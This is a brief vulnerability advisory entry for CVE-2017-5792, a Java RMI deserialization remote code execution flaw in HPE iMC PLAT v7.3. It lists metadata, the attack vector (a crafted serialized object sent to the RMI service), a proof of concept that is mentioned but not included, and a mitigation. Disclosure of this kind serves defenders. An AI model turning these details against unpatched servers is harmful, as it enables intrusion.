Vendor: iMC PLAT
By: Chris Lyne
CVSS: 9.8 CRITICAL
Java RMI Registry Deserialization RCE
CWE: 502
Product Name: iMC PLAT
Affected Version From: HPE iMC PLAT v7.3 (E0504) Standard
Affected Version To: HPE iMC PLAT v7.3 (E0504) Standard
Patch Exists: YES
Related CVE: CVE-2017-5792
CPE: a:hewlett_packard:imc_plat:7.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2008 R2 Enterprise 64-bit
2018
HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
Chris Lyne (@lynerc) discovered a vulnerability in HPE iMC PLAT v7.3 (E0504) Standard that allows remote attackers to execute arbitrary code by sending a crafted serialized Java object to the RMI service. This PoC will launch calc.exe.
Mitigation:
Update to the latest version of HPE iMC PLAT v7.3 (E0504) Standard.